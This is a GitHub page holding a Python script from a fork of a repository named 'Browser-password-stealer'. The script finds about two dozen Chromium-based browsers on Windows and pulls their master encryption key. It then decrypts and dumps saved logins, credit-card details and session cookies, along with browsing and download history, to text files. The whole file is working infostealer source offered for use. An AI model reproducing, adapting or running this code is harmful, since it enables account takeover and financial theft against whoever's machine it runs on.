forked from henry-richard7/Browser-password-stealer
-
Notifications
You must be signed in to change notification settings - Fork 0
/
chromium_based_browsers.py
170 lines (146 loc) · 5.89 KB
/
chromium_based_browsers.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
import base64
import json
import os
import shutil
import sqlite3
from datetime import datetime, timedelta
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData
appdata = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
browsers = {
'avast': appdata + '\\AVAST Software\\Browser\\User Data',
'amigo': appdata + '\\Amigo\\User Data',
'torch': appdata + '\\Torch\\User Data',
'kometa': appdata + '\\Kometa\\User Data',
'orbitum': appdata + '\\Orbitum\\User Data',
'cent-browser': appdata + '\\CentBrowser\\User Data',
'7star': appdata + '\\7Star\\7Star\\User Data',
'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
'vivaldi': appdata + '\\Vivaldi\\User Data',
'chromium': appdata + '\\Chromium\\User Data',
'chrome-canary': appdata + '\\Google\\Chrome SxS\\User Data',
'chrome': appdata + '\\Google\\Chrome\\User Data',
'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
'msedge': appdata + '\\Microsoft\\Edge\\User Data',
'msedge-canary': appdata + '\\Microsoft\\Edge SxS\\User Data',
'msedge-beta': appdata + '\\Microsoft\\Edge Beta\\User Data',
'msedge-dev': appdata + '\\Microsoft\\Edge Dev\\User Data',
'uran': appdata + '\\uCozMedia\\Uran\\User Data',
'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
'iridium': appdata + '\\Iridium\\User Data',
'coccoc': appdata + '\\CocCoc\\Browser\\User Data',
'opera': roaming + '\\Opera Software\\Opera Stable',
'opera-gx': roaming + '\\Opera Software\\Opera GX Stable'
}
data_queries = {
'login_data': {
'query': 'SELECT action_url, username_value, password_value FROM logins',
'file': '\\Login Data',
'columns': ['URL', 'Email', 'Password'],
'decrypt': True
},
'credit_cards': {
'query': 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards',
'file': '\\Web Data',
'columns': ['Name On Card', 'Card Number', 'Expires On', 'Added On'],
'decrypt': True
},
'cookies': {
'query': 'SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies',
'file': '\\Network\\Cookies',
'columns': ['Host Key', 'Cookie Name', 'Path', 'Cookie', 'Expires On'],
'decrypt': True
},
'history': {
'query': 'SELECT url, title, last_visit_time FROM urls',
'file': '\\History',
'columns': ['URL', 'Title', 'Visited Time'],
'decrypt': False
},
'downloads': {
'query': 'SELECT tab_url, target_path FROM downloads',
'file': '\\History',
'columns': ['Download URL', 'Local Path'],
'decrypt': False
}
}
def get_master_key(path: str):
if not os.path.exists(path):
return
if 'os_crypt' not in open(path + "\\Local State", 'r', encoding='utf-8').read():
return
with open(path + "\\Local State", "r", encoding="utf-8") as f:
c = f.read()
local_state = json.loads(c)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
key = CryptUnprotectData(key, None, None, None, 0)[1]
return key
def decrypt_password(buff: bytes, key: bytes) -> str:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def save_results(browser_name, type_of_data, content):
if not os.path.exists(browser_name):
os.mkdir(browser_name)
if content != "" and content != None:
open(f'{browser_name}/{type_of_data}.txt', 'w', encoding="utf-8").write(content)
print(f"\t [*] Saved in {browser_name}/{type_of_data}.txt")
else:
print(f"\t [-] No Data Found!")
def get_data(path: str, profile: str, key, type_of_data):
db_file = f'{path}\\{profile}{type_of_data["file"]}'
if not os.path.exists(db_file):
return
result = ""
try:
shutil.copy(db_file, 'temp_db')
except:
print(f"Can't access file {type_of_data['file']}")
return result
conn = sqlite3.connect('temp_db')
cursor = conn.cursor()
cursor.execute(type_of_data['query'])
for row in cursor.fetchall():
row = list(row)
if type_of_data['decrypt']:
for i in range(len(row)):
if isinstance(row[i], bytes) and row[i]:
row[i] = decrypt_password(row[i], key)
if data_type_name == 'history':
if row[2] != 0:
row[2] = convert_chrome_time(row[2])
else:
row[2] = "0"
result += "\n".join([f"{col}: {val}" for col, val in zip(type_of_data['columns'], row)]) + "\n\n"
conn.close()
os.remove('temp_db')
return result
def convert_chrome_time(chrome_time):
return (datetime(1601, 1, 1) + timedelta(microseconds=chrome_time)).strftime('%d/%m/%Y %H:%M:%S')
def installed_browsers():
available = []
for x in browsers.keys():
if os.path.exists(browsers[x] + "\\Local State"):
available.append(x)
return available
if __name__ == '__main__':
available_browsers = installed_browsers()
for browser in available_browsers:
browser_path = browsers[browser]
master_key = get_master_key(browser_path)
print(f"Getting Stored Details from {browser}")
for data_type_name, data_type in data_queries.items():
print(f"\t [!] Getting {data_type_name.replace('_', ' ').capitalize()}")
notdefault = ['opera-gx'] # Browsers that we do not specify "Default" for profile
profile = "Default"
if browser in notdefault:
profile = ""
data = get_data(browser_path, profile, master_key, data_type)
save_results(browser, data_type_name, data)
print("\t------\n")